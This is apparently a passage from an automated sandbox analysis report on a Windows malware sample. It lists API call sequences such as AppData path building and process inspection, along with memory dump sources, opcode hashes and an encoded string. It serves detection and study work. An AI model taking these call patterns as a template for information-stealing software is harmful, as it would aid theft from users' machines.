                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$XuT$xtT
                          • API String ID: 3105635775-533903547
                          • Opcode ID: 7c9460d8cf6467967a95e7e8e37c44fc39372bc9a6437cdb4d62b1944e2d53e4
                          • Instruction ID: d58875cb90fcf884d103f505d54dffecfb9b454eb1426342d74ffb789ba79a78
                          • Opcode Fuzzy Hash: 7c9460d8cf6467967a95e7e8e37c44fc39372bc9a6437cdb4d62b1944e2d53e4
                          • Instruction Fuzzy Hash: 56016171845B05DAD720AF79980E79AFFE0BF95314F20890DA4D5676A1CBB0AA44CB50
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052E544
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E573
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E581
                          • lstrcat.KERNEL32(?,011AD248), ref: 0052E59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: ac3daa3d087714c413470d1d4e701a178d7041093c4ad86b66a24d7d5eecb533
                          • Instruction ID: 0d69188803c401ea2cb864d10160f4706ff95bb77609f93e5b21f332b62469bd
                          • Opcode Fuzzy Hash: ac3daa3d087714c413470d1d4e701a178d7041093c4ad86b66a24d7d5eecb533
                          • Instruction Fuzzy Hash: C551C6B5A1011DAFD754EB64EC46EEE3B79FF89300F004499BA0697241DB709E808FA5
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00531FDF, 00531FF5, 005320B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 85677080a3ff36f01ee90d1b02337967487d1d4567b42e048ff5587d5ba8283a
                          • Instruction ID: f09104ba7747f427150ade1e4cc2fea0fd2470baffab9a1606b02d7a961823f7
                          • Opcode Fuzzy Hash: 85677080a3ff36f01ee90d1b02337967487d1d4567b42e048ff5587d5ba8283a
                          • Instruction Fuzzy Hash: 9D2137395105899EDB28EA36C44C7DDFB66FF80365F848456C8194B381E336190EDB96
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052EBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052EBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 0052EBF1
                          • lstrcat.KERNEL32(?,011ADD20), ref: 0052EC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 48199b9585a4a8dc2d33ffb1db226827a7217b248cb9d8882e1bf010af498f6f
                          • Instruction ID: 6f1d2cd51906269c592c5f4e5e0b5113b623ff17c45c319e14acdbe445852c9a
                          • Opcode Fuzzy Hash: 48199b9585a4a8dc2d33ffb1db226827a7217b248cb9d8882e1bf010af498f6f
                          • Instruction Fuzzy Hash: 5231D97195011D9BDB21EF64EC46BEE7BB5BF89300F0044A5B60697290DF709EC48F94
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 00534492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 005344AD
                          • CloseHandle.KERNEL32(00000000), ref: 005344B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 005344E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: 89cca49b664edda8b8c631544b1b6cca4d430c7a61b34870bc36ddfee712eafd
                          • Instruction ID: d55635fe1d59254bae61d35043f87b6dd3267cdbcbc325fb36f3a273f3ed2c9f
                          • Opcode Fuzzy Hash: 89cca49b664edda8b8c631544b1b6cca4d430c7a61b34870bc36ddfee712eafd
                          • Instruction Fuzzy Hash: FCF0FCB49016152BFB209B749C4DBEA7FA8FF15704F0445A1FB85D7180DBB49CC48B94
                          APIs
                          • __getptd.LIBCMT ref: 00538FDD
                            • Part of subcall function 005387FF: __amsg_exit.LIBCMT ref: 0053880F
                          • __getptd.LIBCMT ref: 00538FF4
                          • __amsg_exit.LIBCMT ref: 00539002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00539026
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 05d7c0d42690101b552edd1e2ea69b54316ab7153ff962900be40c76e54b0942
                          • Instruction ID: 4b4f4fd047a0fc7ff7b456727b089e571436f734c51e6590c7c942cb168e45fe
                          • Opcode Fuzzy Hash: 05d7c0d42690101b552edd1e2ea69b54316ab7153ff962900be40c76e54b0942
                          • Instruction Fuzzy Hash: 5CF059B2D087158BDB38BB78980F7AD7FA1BF44720F244508F000AB2D2DFB41901EA65
                          APIs
                          • lstrlen.KERNEL32(------,00515BEB), ref: 0053731B
                          • lstrcpy.KERNEL32(00000000), ref: 0053733F
                          • lstrcat.KERNEL32(?,------), ref: 00537349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: b3778380a05b7b7e92e8ef46db33a1cd0bacf4e929ade93ac0f48378d0dfa5fa
                          • Instruction ID: 7b1009b2b760c0ce614f8464aab7071d216d93a171f93065ab20287a75090831
                          • Opcode Fuzzy Hash: b3778380a05b7b7e92e8ef46db33a1cd0bacf4e929ade93ac0f48378d0dfa5fa
                          • Instruction Fuzzy Hash: 2BF0C0B8911706DFDB649F75D84892BBBF9FF85701718881DA89AC7214E734D850CB10
                          APIs
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00523422
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 00523471
                          • lstrcpy.KERNEL32(00000000,?), ref: 00523497
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: b1feeec2c6772b29f9030e26cb666e197a7aeff2287dcbc7fc768e894543669a
                          • Instruction ID: d611749910049658108b38fb870b6609934328f8a999c59a56d8b093d8c41eed
                          • Opcode Fuzzy Hash: b1feeec2c6772b29f9030e26cb666e197a7aeff2287dcbc7fc768e894543669a
                          • Instruction Fuzzy Hash: 76120D74A012218FDB28CF19D558B25BBE5BF46714B1DC0AEE8098B3E1D77AED42CB40
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 00527CAF
                            • Part of subcall function 00527D40: std::_Xinvalid_argument.LIBCPMT ref: 00527D58
                            • Part of subcall function 00527D40: std::_Xinvalid_argument.LIBCPMT ref: 00527D76
                            • Part of subcall function 00527D40: std::_Xinvalid_argument.LIBCPMT ref: 00527D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: cb013bcf31856442225263195520408daae33612b73d1e573c3ebc81e6bfcade
                          • Instruction ID: dc6b3cdcfc35e275ed014509d6716f45c29437744f5105a60949e66086c3dd98
                          • Opcode Fuzzy Hash: cb013bcf31856442225263195520408daae33612b73d1e573c3ebc81e6bfcade
                          • Instruction Fuzzy Hash: 1831EA723086288BD724DE7CF88096AFBE5FF9A760B204A2AF541DB6C1C7719C418394
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00516F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00516F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: 7289385caf8c34edd41d0665b2ec8399f2e142e0b9397176deecfd3dca116153
                          • Instruction ID: a2e50279e1e60999105c37f227e49df20d4970536150795efa945ff429b117fa
                          • Opcode Fuzzy Hash: 7289385caf8c34edd41d0665b2ec8399f2e142e0b9397176deecfd3dca116153
                          • Instruction Fuzzy Hash: 47215BB16106029BEB208B24DC94BB677A8FB45705F444878F946CB688F779E986C750
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 005315A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 005315D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 00531611
                          • lstrcpy.KERNEL32(00000000,?), ref: 00531649
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 427a3753e7f30078e30f9fd090cd2584a9d018587b3bb6a0591fa15f6220f8c8
                          • Instruction ID: b1a1317483ef0f0327b0096bf145208cfb3dca47554e1c9ba5f9bce842e6e46b
                          • Opcode Fuzzy Hash: 427a3753e7f30078e30f9fd090cd2584a9d018587b3bb6a0591fa15f6220f8c8
                          • Instruction Fuzzy Hash: E021D774601B029BE735DF7AD459A17BBF5BF84700F04491DA496C7A40DB34E891CFA4
                          APIs
                            • Part of subcall function 00511610: lstrcpy.KERNEL32(00000000), ref: 0051162D
                            • Part of subcall function 00511610: lstrcpy.KERNEL32(00000000,?), ref: 0051164F
                            • Part of subcall function 00511610: lstrcpy.KERNEL32(00000000,?), ref: 00511671
                            • Part of subcall function 00511610: lstrcpy.KERNEL32(00000000,?), ref: 00511693
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511557
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511579
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
